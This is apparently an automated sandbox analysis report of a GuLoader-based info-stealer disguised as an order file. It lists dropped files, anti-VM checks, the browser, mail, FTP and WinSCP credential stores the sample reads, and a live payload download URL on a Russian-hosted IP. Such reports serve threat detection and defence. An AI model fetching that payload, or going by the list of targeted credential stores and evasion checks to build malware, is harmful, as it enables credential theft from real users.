Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Order 00293884800595.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: Order 00293884800595.bat.exe PID: 9012, type: MEMORYSTR
Source: Yara match	File source: 00000005.00000002.1802216811117.0000000005184000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Code function: 5_2_6CA51B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

5_2_6CA51B28

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00150C45 push ebx; retf	8_2_00150C52
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00150C6D push edi; retf	8_2_00150C7A
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FB80B0 pushad ; ret	8_2_35FB845D
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FBA040 push eax; ret	8_2_35FBA041
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FB9F4E push ecx; ret	8_2_35FB9F4F

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Ragworm.Loy	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Allopurinol.flu	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Incute.Reb	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Charting.skr	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\chokoladeforretning.mar	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\doubling.reg	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\hmoriderne.ner	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\lvens.flb	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\materialiter.sig	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\preinvest.pri	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\ridningen.txt	Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	API/Special instruction interceptor: Address: 569A83C
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	API/Special instruction interceptor: Address: 26CA83C

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Memory allocated: 33EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Memory allocated: 33DD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_00405A4F
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_00406620 FindFirstFileA,FindClose,	5_2_00406620
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_004027CF FindFirstFileA,	5_2_004027CF
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	8_2_00405A4F
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00406620 FindFirstFileA,FindClose,	8_2_00406620
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_004027CF FindFirstFileA,	8_2_004027CF

Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003878000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003844000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	API call chain: ExitProcess graph end node			graph_5-4674
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	API call chain: ExitProcess graph end node			graph_5-4525

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Code function: 5_2_6CA51B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

5_2_6CA51B28

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Process created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Queries volume information: C:\Users\user\Desktop\Order 00293884800595.bat.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Code function: 5_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

5_2_004033D8

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000008.00000002.1807122448137.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Order 00293884800595.bat.exe PID: 8160, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	126 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	2 Obfuscated Files or Information	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Virtualization/Sandbox Evasion	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Order 00293884800595.bat.exe	100%	Avira	HEUR/AGEN.1338492
Order 00293884800595.bat.exe	14%	ReversingLabs	Win32.Trojan.Generic
Order 00293884800595.bat.exe	20%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org	0%	Avira URL Cloud	safe
http://109.248.151.29/DttVKmqMztLpGMCsim17.binu	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_Error	0%	Avira URL Cloud	safe
https://api.ipify.org/	0%	Avira URL Cloud	safe
https://api.ipify.org/t	0%	Avira URL Cloud	safe
http://109.248.151.29/DttVKmqMztLpGMCsim17.bin	100%	Avira URL Cloud	malware
http://nsis.sf.net/NSIS_Error	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
https://api.ipify.org/	1%	Virustotal		Browse
http://www.skinstudio.netG	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Virustotal		Browse
http://nsis.sf.net/NSIS_ErrorError	0%	Virustotal		Browse
https://api.ipify.org	1%	Virustotal		Browse
https://api.ipify.org/t	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://109.248.151.29/DttVKmqMztLpGMCsim17.bin	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	Order 00293884800595.bat.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Order 00293884800595.bat.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://109.248.151.29/DttVKmqMztLpGMCsim17.binu	Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003858000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/t	Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.skinstudio.netG	Order 00293884800595.bat.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.248.151.29	unknown	Russian Federation		52048	DATACLUBLV	false
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465164
Start date and time:	2024-07-01 12:08:00 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Order 00293884800595.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/17@1/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 95% Number of executed functions: 127 Number of non-executed functions: 67
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Order 00293884800595.bat.exe, PID 8160 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.248.151.29	Order 000293884849900.bat.exe	Get hash	malicious	GuLoader	Browse	109.248.151.29/RjdSJnnj92.bin
172.67.74.152	242764.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	K8mzlntJVN.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	stub.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	stub.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Potwierdzenie zam#U00f3wienia.doc.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	172.67.74.152
	Vsl_MV DART TRADER_001.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	DHL Arrival Notice.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
